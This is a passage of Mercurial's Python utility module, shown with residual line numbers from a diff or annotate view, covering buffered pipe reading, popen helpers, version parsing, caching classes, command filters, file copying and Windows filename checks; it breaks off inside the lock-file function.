    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """

    def __init__(self, input):
        # the underlying unbuffered pipe-like object
        self._input = input
        # list of buffered chunks, oldest first; collapsed by _frombuffer
        self._buffer = []
        # set once os.read() returns an empty string
        self._eof = False
        # total number of buffered bytes across all chunks
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        # delegate to the wrapped pipe
        return self._input.closed

    def fileno(self):
        # expose the wrapped fd so this object can be passed to select/poll
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        """read up to ``size`` bytes; returns less only at end of stream"""
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        """read one line, buffering input until a newline or EOF is seen"""
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        # lfi: index of the first newline in the last chunk, or -1
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            # collapse all chunks so the remainder is a single piece
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        # os.read on the raw fd bypasses any stdio-level buffering
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)
420
420
def mmapread(fp):
    """Return a read-only mmap of ``fp``'s contents.

    ``fp`` may be a file object (its fileno() is used) or a raw file
    descriptor.  Empty files cannot be mmapped; they yield '' instead.
    """
    fd = getattr(fp, 'fileno', lambda: fp)()
    try:
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # mmap rejects zero-length maps; fall back to an empty buffer,
        # re-raising for any other ValueError cause
        if os.fstat(fd).st_size == 0:
            return ''
        raise
431
431
def popen2(cmd, env=None, newlines=False):
    """Spawn ``cmd`` through the shell; return its (stdin, stdout) pipes."""
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    proc = subprocess.Popen(cmd, shell=True, bufsize=-1,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout
442
442
def popen3(cmd, env=None, newlines=False):
    """Like popen4(), but drop the Popen object from the return value."""
    pipes = popen4(cmd, env, newlines)
    return pipes[0], pipes[1], pipes[2]
446
446
def popen4(cmd, env=None, newlines=False, bufsize=-1):
    """Spawn ``cmd`` through the shell.

    Returns a (stdin, stdout, stderr, proc) tuple with all three pipes
    plus the underlying Popen object.
    """
    proc = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout, proc.stderr, proc
455
455
def version():
    """Return version information if available."""
    try:
        from . import __version__
    except ImportError:
        # no generated __version__ module (e.g. running from a checkout)
        return 'unknown'
    return __version__.version
463
463
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # split at the first '+' or '-': everything after it is the "extra" part.
    # Use a raw string: '\+' in a plain literal is an invalid escape sequence
    # (DeprecationWarning on Python 3.6+).
    parts = remod.split(r'[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    # collect leading integer components; stop at the first non-integer
    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
532
532
# used by parsedate
# Formats are tried in order; the first one that matches the input wins.
defaultdateformats = (
    '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
    '%Y-%m-%dT%H:%M',    #   without seconds
    '%Y-%m-%dT%H%M%S',   # another awful but legal variant without :
    '%Y-%m-%dT%H%M',     #   without seconds
    '%Y-%m-%d %H:%M:%S', # our common legal variant
    '%Y-%m-%d %H:%M',    #   without seconds
    '%Y-%m-%d %H%M%S',   # without :
    '%Y-%m-%d %H%M',     #   without seconds
    '%Y-%m-%d %I:%M:%S%p',
    '%Y-%m-%d %H:%M',
    '%Y-%m-%d %I:%M%p',
    '%Y-%m-%d',
    '%m-%d',
    '%m/%d',
    '%m/%d/%y',
    '%m/%d/%Y',
    '%a %b %d %H:%M:%S %Y',
    '%a %b %d %I:%M:%S%p %Y',
    '%a, %d %b %Y %H:%M:%S',  #  GNU coreutils "/bin/date --rfc-2822"
    '%b %d %H:%M:%S %Y',
    '%b %d %I:%M:%S%p %Y',
    '%b %d %H:%M:%S',
    '%b %d %I:%M:%S%p',
    '%b %d %H:%M',
    '%b %d %I:%M%p',
    '%b %d %Y',
    '%b %d',
    '%H:%M:%S',
    '%I:%M:%S%p',
    '%H:%M',
    '%I:%M%p',
)
567
567
# coarser formats (year/month only) accepted in addition to the defaults,
# e.g. for date range queries where a full timestamp is not required
extendeddateformats = defaultdateformats + (
    "%Y",
    "%Y-%m",
    "%b",
    "%b %Y",
)
574
574
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount
    if argcount == 0:
        # zero-argument functions: memoize the single result in a one-slot
        # list (set on first call, reused forever after)
        slot = []
        def f():
            if not slot:
                slot.append(func())
            return slot[0]
        return f
    memo = {}
    if argcount == 1:
        # slightly faster: skip tuple packing/unpacking for the common
        # single-argument case
        def f(arg):
            if arg not in memo:
                memo[arg] = func(arg)
            return memo[arg]
    else:
        def f(*args):
            if args not in memo:
                memo[args] = func(*args)
            return memo[args]

    return f
600
600
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        pending = getattr(self, '_copied', 0)
        if pending:
            # someone holds a logical copy: hand them a real one instead
            self._copied = pending - 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        # just count outstanding logical copies; the real copy is deferred
        # until someone calls preparewrite()
        self._copied = getattr(self, '_copied', 0) + 1
        return self
618
618
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # delete first so that re-setting an existing key moves it to the
        # end, preserving "last-set" iteration order
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v
643
643
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
669
669
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """
675
675
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, exctraceback):
        # close() only on a clean exit; release() runs unconditionally
        succeeded = exctype is None
        try:
            if succeeded:
                self.close()
        finally:
            self.release()
700
700
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        try:
            yield
            tr.close()
        except error.InterventionRequired:
            # the transaction still counts as successful in this case
            tr.close()
            raise
    finally:
        tr.release()
718
718
@contextlib.contextmanager
def nullcontextmanager():
    """A context manager that does nothing on enter or exit."""
    yield
722
722
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.prev = None
        self.next = None
        # key is the module-level _notset sentinel while the slot is unused
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
741
741
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        # ``max`` is the capacity: the maximum number of entries retained
        self._cache = {}

        # start with a single node linked to itself; more nodes are added
        # lazily by _addcapacity() as entries are inserted, up to capacity
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        # a successful lookup refreshes the entry's recency
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        # empty every occupied node but keep the allocated ring for reuse
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
900
900
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()

    if func.__code__.co_argcount == 1:
        # avoid tuple packing for the common single-argument case
        def f(arg):
            if arg in cache:
                # cache hit: just refresh recency below
                order.remove(arg)
            else:
                if len(cache) > 20:
                    # evict the least recently used entry
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args in cache:
                order.remove(args)
            else:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            order.append(args)
            return cache[args]

    return f
927
927
class propertycache(object):
    """Descriptor caching the decorated function's result on the instance.

    The first attribute access computes the value and stores it in the
    instance __dict__ under the same name, so later accesses bypass this
    descriptor entirely.
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
940
940
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    # pop via the instance dict so descriptors are not triggered; a missing
    # entry is silently ignored
    obj.__dict__.pop(prop, None)
945
945
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE)
    # feed the whole input, wait for exit, and hand back captured stdout
    out, _err = proc.communicate(s)
    return out
952
952
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname = outname = None
    try:
        # write the input to a temp file for the command to read
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        # reserve an output file; the command will overwrite it
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname).replace('OUTFILE', outname)
        code = os.system(cmd)
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            # on OpenVMS an odd status means success
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # best-effort cleanup of both temp files
        for name in (inname, outname):
            try:
                if name:
                    os.unlink(name)
            except OSError:
                pass
986
986
# maps a filter-spec prefix to the function implementing that filter style
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
}
991
991
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    # dispatch on a recognized prefix ('tempfile:' or 'pipe:'); anything
    # unprefixed runs through a pipe
    for prefix, fn in filtertable.iteritems():
        if cmd.startswith(prefix):
            return fn(s, cmd[len(prefix):].lstrip())
    return pipefilter(s, cmd)
998
998
def binary(s):
    """return true if a string is binary data"""
    # empty or None input is never binary; otherwise look for a NUL byte
    if not s:
        return False
    return '\0' in s
1002
1002
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        if not x:
            return 0
        bits = 0
        while x:
            x >>= 1
            bits += 1
        return bits - 1

    pending = []
    pendinglen = 0
    for chunk in source:
        pending.append(chunk)
        pendinglen += len(chunk)
        if pendinglen < min:
            continue
        if min < max:
            # double the threshold, or jump straight to the size we
            # actually accumulated if that is larger, capped at max
            min = min << 1
            nmin = 1 << log2(pendinglen)
            if nmin > min:
                min = nmin
            if min > max:
                min = max
        yield ''.join(pending)
        pending = []
        pendinglen = 0
    if pending:
        # flush whatever is left, even if smaller than min
        yield ''.join(pending)
1033
1033
# re-export error.Abort under its historical name; callers use util.Abort
Abort = error.Abort
1035
1035
def always(fn):
    """Matcher predicate that accepts every file; ignores its argument."""
    return True
1038
1038
def never(fn):
    """Matcher predicate that rejects every file; ignores its argument."""
    return False
1041
1041
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue have been fixed in 2.7. But it still affect
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # re-enable only if the collector was running when we started
            if wasenabled:
                gc.enable()
    return wrapper
1064
1064
if pycompat.ispypy:
    # PyPy runs slower with gc disabled; make nogc a no-op decorator there
    nogc = lambda x: x
1068
1068
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        # nothing to be relative to: n2 (relative to root) is the answer
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # different drives (Windows): no relative path exists, so fall
            # back to the absolute location of n2
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    # strip the path components shared by both, from the root downward
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    # climb out of what remains of n1, then descend into n2
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1094
1094
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    # equivalent to chaining the three checks with 'or': return the first
    # truthy result, else the last one
    frozen = safehasattr(sys, "frozen")          # new py2exe
    if not frozen:
        frozen = safehasattr(sys, "importers")   # old py2exe
    if not frozen:
        frozen = imp.is_frozen(u"__main__")      # tools/freeze
    return frozen
1104
1104
# the location of data files matching the source code
# (frozen py2exe executables don't support __file__, so fall back to the
# interpreter binary's directory in that case)
datapath = os.path.dirname(
    pycompat.sysexecutable
    if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app'
    else pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

# cached location of the 'hg' executable, filled lazily by hgexecutable()
_hgexecutable = None
1115
1115
def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.
    """
    if _hgexecutable is None:
        envhg = encoding.environ.get('HG')
        mainmod = sys.modules[pycompat.sysstr('__main__')]
        if envhg:
            _sethgexecutable(envhg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        else:
            mainscript = pycompat.fsencode(getattr(mainmod, '__file__', ''))
            if os.path.basename(mainscript) == 'hg':
                # running from an 'hg' script (e.g. the repo checkout)
                _sethgexecutable(mainscript)
            else:
                _sethgexecutable(findexe('hg')
                                 or os.path.basename(sys.argv[0]))
    return _hgexecutable
1139
1139
def _sethgexecutable(path):
    """set location of the 'hg' executable

    Stores path in the module-level _hgexecutable cache read by
    hgexecutable().
    """
    global _hgexecutable
    _hgexecutable = path
1144
1144
1145 def _isstdout(f):
1145 def _isstdout(f):
1146 fileno = getattr(f, 'fileno', None)
1146 fileno = getattr(f, 'fileno', None)
1147 return fileno and fileno() == sys.__stdout__.fileno()
1147 return fileno and fileno() == sys.__stdout__.fileno()
1148
1148
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def _shellval(val):
        'convert python object into string that is useful to shell'
        # shells have no booleans/None; encode them as '0'/'1'
        if val is True:
            return '1'
        if val is None or val is False:
            return '0'
        return str(val)

    env = dict(encoding.environ)
    if environ:
        for key, value in environ.iteritems():
            env[key] = _shellval(value)
    env['HG'] = hgexecutable()
    return env
1163
1163
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    # flush our own stdout first so output interleaves sensibly
    try:
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or _isstdout(out):
        # child may write straight to our stdout
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        # capture combined stdout+stderr and forward every line to `out`
        p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd, stdout=subprocess.PIPE,
                             stderr=subprocess.STDOUT)
        for line in iter(p.stdout.readline, ''):
            out.write(line)
        p.wait()
        rc = p.returncode
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        # OpenVMS encodes success in the low status bit
        rc = 0
    return rc
1190
1190
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def checked(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # a one-frame traceback means the TypeError came from the call
            # itself (bad argument list), not from inside func
            if len(traceback.extract_tb(sys.exc_info()[2])) != 1:
                raise
            raise error.SignatureError

    return checked
1202
1202
1203 # a whilelist of known filesystems where hardlink works reliably
1203 # a whilelist of known filesystems where hardlink works reliably
1204 _hardlinkfswhitelist = {
1204 _hardlinkfswhitelist = {
1205 'btrfs',
1205 'btrfs',
1206 'ext2',
1206 'ext2',
1207 'ext3',
1207 'ext3',
1208 'ext4',
1208 'ext4',
1209 'hfs',
1209 'hfs',
1210 'jfs',
1210 'jfs',
1211 'NTFS',
1211 'NTFS',
1212 'reiserfs',
1212 'reiserfs',
1213 'tmpfs',
1213 'tmpfs',
1214 'ufs',
1214 'ufs',
1215 'xfs',
1215 'xfs',
1216 'zfs',
1216 'zfs',
1217 }
1217 }
1218
1218
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember the old stat to detect mtime ambiguity after copying
            oldstat = filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow
        # hardlinks unless we are confident that dest is on a whitelisted
        # filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        hardlink = fstype in _hardlinkfswhitelist
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        # copytime is ignored for symlinks, but in general copytime isn't
        # needed for them anyway
        os.symlink(os.readlink(src), dest)
        return
    try:
        shutil.copyfile(src, dest)
        if copystat:
            # copystat also copies mode
            shutil.copystat(src, dest)
        else:
            shutil.copymode(src, dest)
        if oldstat and oldstat.stat:
            newstat = filestat.frompath(dest)
            if newstat.isambig(oldstat):
                # stat of copied file is ambiguous to original one
                advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                os.utime(dest, (advanced, advanced))
    except shutil.Error as inst:
        raise Abort(str(inst))
1270
1270
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible."""
    copied = 0

    def _topic():
        # progress topic reflects whether we link or copy
        return _('linking') if hardlink else _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # linking only works when both sides share a device
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = _topic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                # shift child progress by the files already handled
                if pos is not None:
                    return progress(t, pos + copied)
            hardlink, n = copyfiles(srcname, dstname, hardlink,
                                    progress=nprog)
            copied += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = _topic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # linking failed: copy instead and stop trying to link
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        copied += 1
        progress(topic, copied)

    progress(topic, None)

    return hardlink, copied
1310
1310
1311 _winreservednames = {
1311 _winreservednames = {
1312 'con', 'prn', 'aux', 'nul',
1312 'con', 'prn', 'aux', 'nul',
1313 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1313 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1314 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1314 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1315 }
1315 }
1316 _winreservedchars = ':*?"<>|'
1316 _winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for component in path.replace('\\', '/').split('/'):
        if not component:
            continue
        for ch in _filenamebytestr(component):
            if ch in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % ch
            if ord(ch) <= 31:
                # control characters are never valid in Windows names
                return _("filename contains '%s', which is invalid "
                         "on Windows") % escapestr(ch)
        stem = component.split('.')[0]
        if stem and stem.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % stem
        tail = component[-1:]
        if tail in '. ' and component not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % tail
1363
1363
# Windows needs our own filename validation; other platforms delegate to
# the platform module. Also pick the best wall-clock for timing.
if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

# prefer the high-resolution counter when this Python provides it (>= 3.3)
if safehasattr(time, "perf_counter"):
    timer = time.perf_counter
1373
1373
def makelock(info, pathname):
    """Create a lock file at pathname holding info.

    Preferred form is a symlink whose target encodes info (created
    atomically); when symlinks raise EEXIST the lock is already held and
    the error propagates. Falls back to an exclusively-created regular
    file on platforms without symlinks.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as err:
        if err.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    # fallback: O_EXCL guarantees we don't clobber an existing lock
